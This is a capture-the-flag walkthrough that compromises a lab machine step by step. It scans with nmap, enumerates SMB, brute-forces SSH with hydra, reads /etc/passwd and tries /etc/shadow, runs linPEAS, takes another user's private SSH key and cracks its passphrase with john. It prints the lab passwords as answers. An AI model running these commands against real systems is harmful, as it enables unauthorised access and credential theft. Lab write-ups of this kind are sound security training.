Deploy the machine and connect to our network
This one is self explanatory
Find the services exposed by the machine
nmap -Sv 10.80.154.156Looks like we have SMB, HTTP, and SSH
What is the name of the hidden directory on the web server(enter name without /)?
gobuster dir -u 10.80.154.156 -w ~/Repos/Pentesting/SecLists/Discovery/Web-Content/common.txt -x php,html,js,txt,asp,aspx,jsp
# or
nikto -h 10.80.154.156Answer: development
User brute-forcing to find the username & password
What is the username?
I manually connected to SMB share as a guest and found staff.txt with 2 names. I got lucky as there was an Anonymous share I could connect to as a guest, a better approach to this would be to use SMBMap
nmap -sC -p 139,445 -sV 10.80.154.156
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-16 17:46 +0000
Nmap scan report for 10.80.154.156
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-16T17:46:25
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.93 secondssmbmap -H 10.80.154.156
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 10.80.154.156:445 Name: 10.80.154.156 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
Anonymous READ ONLY
IPC$ NO ACCESS IPC Service (Samba Server 4.15.13-Ubuntu)
[*] Closed 1 connectionssmbclient \\\\10.80.154.156\\Anonymous
smb: \> ls
. D 0 Thu Apr 19 17:31:20 2018
.. D 0 Thu Apr 19 17:13:06 2018
staff.txt N 173 Thu Apr 19 17:29:55 2018
g
14282840 blocks of size 1024. 6427448 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)cat staff.txt
"
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
"Answer: jan
What is the password?
msfdb init
msfconsole
>use auxiliary/scanner/smb/smb_login
>set DETECT_ANY_AUTH false
>set RHOSTS 10.80.145.254
>set SMBUser jan
>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
>runMetasploit seems to be giving a false positive on the password for jan, lets try with hydra
hydra -l jan -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.80.145.254 smb2Looks like I'm getting false positives still, maybe I should be attacking ssh
hydra -l jan -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.80.145.254 ssh
[22][ssh] host: 10.80.145.254 login: jan password: armandoGot it!
Answer: armando
What service do you use to access the server (answer in abbreviation in all caps)?
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
What is the name of the other user you found(all lower case)?
I have found a few ways of getting the other username
enum4linux -a 10.80.145.254
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
...ssh jan@10.80.145.254
jan@ip-10-80-145-254:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jan@ip-10-80-145-254:~$ sudo !!
sudo cat /etc/shadow
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-80-145-254:~$ cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
jan:x:1001:1001::/home/jan:/bin/bash
ubuntu:x:1002:1002:Ubuntu:/home/ubuntu:/bin/bash
ls /home/Answer: kay
If you have found another user, what can you do with this information?
What is the final password you obtain?
Brute forcing ssh username kay did not work and nothing readable is found in /home/kay
Lets try using linPEAS
cd ~/bin
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
scp ./linpeas.sh jan@10.80.145.254:/dev/shm
ssh jan@10.80.145.254
cd /dev/shm
chmod +x ./linpeas.sh
./linpeas.shLooks like we can read /home/kay/.ssh/id_rsa I'll copy that and try and ssh using that private key
chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay@10.80.145.254Seems that there is a passphrase on the key, lets see if we can brute force it
ssh2john kay_id_rsa > kay_id_rsa-4john.txt
john kay_id_rsa-4john.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
beeswax (kay_id_rsa)
...Great now lets try ssh back in using kay and the password
ssh -i kay_id_rsa kay@10.80.145.254
Enter passphrase for key 'kay_id_rsa': beeswax
ls
cat pass.baknow if we try run sudo with any command using that password it looks like we can do so.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy$$